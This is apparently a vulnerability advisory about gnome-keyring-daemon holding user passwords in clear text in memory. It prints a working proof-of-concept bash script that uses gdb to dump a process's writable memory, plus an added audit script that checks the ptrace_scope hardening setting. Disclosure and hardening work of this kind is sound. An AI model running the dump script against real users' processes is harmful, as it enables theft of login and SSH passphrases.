Gnome Keyring Daemon Credential Disclosure



EKU-ID: 6542 CVE: OSVDB-ID:
Author: Luca Ercoli Published: 2017-04-25 Verified: Verified


gnome-keyring-daemon is vulnerable to local credential disclosure.

Fortunately, the attack can only be mounted on already compromised machines, but sadly, in those cases, an attacker can leverage gnome-keyring-daemon to obtain sensitive data.

The application stores the passwords of logged-in users in clear text in its process memory, and so exposes this information (such as the login password, the ssh-agent passphrase, etc.) to an attacker.

In this scenario, the attacker can read the data instantly, without cracking it and without installing a keylogger, a sniffer or various other tools. Using gnome-keyring-daemon alone is enough, because the information can be extracted from its memory with a debugger (such as "gdb").

At this URL, there is a script (named "memory_dump.sh") that can be used as a PoC:

http://www.lucaercoli.it/

memory_dump.sh:

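#!/bin/bash
# Usage: memory_dump.sh <pid>
# Dumps every writable private (rw-p) mapping of the process to <start>-<end>.dump

pid=$1
mkdir "$pid" || exit 1
cd "$pid" || exit 1
# Column 1 of /proc/<pid>/maps is the "start-end" address range
grep rw-p "/proc/$pid/maps" \
| awk '{print $1}' \
| sed 's/-/ /' \
| while read -r mem_start mem_end; do
    gdb --pid "$pid" --batch-silent -ex "dump memory $mem_start-$mem_end.dump 0x$mem_start 0x$mem_end"
done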
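
The debugger attach described above depends on the kernel permitting ptrace between processes of the same user. The following audit script is an added example, not part of the original advisory or the author's PoC: it reports whether that attach is permitted for each running gnome-keyring-daemon, based on the Linux Yama `ptrace_scope` setting. The function names are hypothetical, and it assumes UID 0 holds CAP_SYS_PTRACE and that the target process is dumpable.

```bash
#!/bin/bash
# Added example (not from the advisory): report whether a same-user debugger
# attach to gnome-keyring-daemon is permitted by the Yama ptrace_scope setting.

# Read the Yama setting; a missing file is treated as 0 (classic same-UID rule).
read_scope() {
    local f="${1:-/proc/sys/kernel/yama/ptrace_scope}"
    if [ -r "$f" ]; then cat "$f"; else echo 0; fi
}

# Real UID of a process, taken from the "Uid:" line of a /proc/<pid>/status file.
status_uid() {
    awk '/^Uid:/ {print $2}' "$1"
}

# Verdict for attaching to an unrelated (non-child) process.
# Assumptions: UID 0 holds CAP_SYS_PTRACE, and the target is dumpable.
attach_verdict() {
    local scope="$1" caller_uid="$2" target_uid="$3"
    case "$scope" in
        3) echo "blocked" ;;                      # attach disabled for everyone
        1|2) if [ "$caller_uid" = 0 ]; then echo "allowed"; else echo "blocked"; fi ;;
        0) if [ "$caller_uid" = 0 ] || [ "$caller_uid" = "$target_uid" ]; then
               echo "allowed"
           else
               echo "blocked"
           fi ;;
        *) echo "unknown" ;;
    esac
}

# Print the verdict for every gnome-keyring-daemon on this host.
audit_host() {
    local scope pid uid
    scope=$(read_scope)
    echo "ptrace_scope=$scope"
    # The kernel truncates the process name to 15 characters: gnome-keyring-d
    for pid in $(pgrep -x gnome-keyring-d 2>/dev/null || true); do
        uid=$(status_uid "/proc/$pid/status" 2>/dev/null || true)
        echo "pid=$pid uid=$uid same-user attach: $(attach_verdict "$scope" "$uid" "$uid")"
    done
}

audit_host
```

A verdict of `allowed` at scope 0 means the attach works for any process running as the same user; raising `kernel.yama.ptrace_scope` to 1 or higher removes it for unrelated non-root processes.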